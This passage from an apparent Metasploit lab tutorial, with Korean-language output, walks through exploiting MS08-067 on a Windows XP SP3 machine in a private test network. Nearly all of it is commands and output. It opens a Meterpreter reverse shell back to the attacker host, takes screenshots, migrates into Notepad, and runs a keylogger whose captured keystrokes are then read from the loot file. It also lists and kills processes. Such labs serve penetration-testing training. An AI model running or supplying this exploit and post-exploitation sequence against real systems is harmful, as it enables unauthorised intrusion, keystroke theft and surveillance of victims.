windows/meterpreter/reverse_tcp_dns
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.10.135 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: , , seh, thread, process, none)
LHOST 192.168.10.134 yes The listen address
LPORT 8080 yes The listen port
Exploit target:
Id Name
-- ----
47 Windows XP SP3 Korean (NX)
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 192.168.10.134:8080
[*] Attempting to trigger the vulnerability...
[*] Sending stage (885806 bytes) to 192.168.10.135
[*] Meterpreter session 2 opened (192.168.10.134:8080 -> 192.168.10.135:1082) at 2016-01-24 15:49:27 +0900
meterpreter > shell
Process 2488 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
C:\WINDOWS\system32>ipconfig
Windows IP Configuration
Ethernet adapter 로컬 영역 연결:
Connection-specific DNS Suffix . : localdomain
IP Address. . . . . . . . . . . . : 192.168.10.135
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.10.2
C:\WINDOWS\system32>
C:\WINDOWS\system32>^Z (ctrl+z)
Background channel 1? [y/N] y
[-] Error running command shell: ThreadError can't be called from trap context
meterpreter >
Ex4) Checking target system information and processes
meterpreter > sysinfo    show target system information
meterpreter > ps    list the processes running on the target
Ex5) Screenshot of the target's screen
meterpreter > screenshot    take a screenshot of the target's screen
Screenshot saved to: /root/prTcNwSY.jpeg
- Open the screenshot in root's home directory from the GUI
Ex6) Keylogging on the target system
- Open Notepad on the Win XP machine
meterpreter > ps    find the PID of Notepad on Win XP
2944 notepad.exe x86 0 WITH-15B28B4CFD\admin C:\WINDOWS\system32\notepad.exe
meterpreter > migrate 2944    migrate into that process for keylogging
[*] Migrating from 1072 to 2944...
[*] Migration completed successfully.
meterpreter > run post/windows/capture/keylog_recorder
- Type text into Notepad on Win XP
안녕하세요 타겟입니다.    (Korean: "Hello, this is the target.")
Hello Hi
meterpreter > run post/windows/capture/keylog_recorder
[*] Executing module against WITH-15B28B4CFD
[*] Starting the keystroke sniffer...
[*] Keystrokes being saved in to /root/.msf4/loot/20160124163330_default_192.168.10.135_host.windows.key_308141.txt
[*] Recording keystrokes...
(ctrl+c)
^C[*] Saving last few keystrokes...
[*] Interrupt
[*] Stopping keystroke sniffer...
meterpreter >
root@kali:~# ls -la /root/.msf4/loot
합계 12
drwxr-xr-x 2 root root 4096 1월 24 16:33 .
drwxr-xr-x 8 root root 4096 1월 24 10:01 ..
-rw-r--r-- 1 root root 193 1월 24 16:33 20160124163330_default_192.168.10.135_host.windows.key_308141.txt
root@kali:~# cat /root/.msf4/loot/20160124163330_default_192.168.10.135_host.windows.key_308141.txt
Keystroke log started at 2016-01-24 16:33:30 +0900
dkssu <Back> <Back> <Back> <Back> <Back>
ssudpdy rptt <Back> dlqsl <Return> <Return>
ello <Back> <Back> <Back> <Back> <Back> Ho H
Ex7) Force-terminating a program on the target system
meterpreter > kill 2944
meterpreter > quit
[*] Shutting down Meterpreter...
[*] 192.168.10.135 - Meterpreter session 3 closed. Reason: User exit
msf exploit(ms08_067_netapi) >
msf exploit(ms08_067_netapi) > back
msf >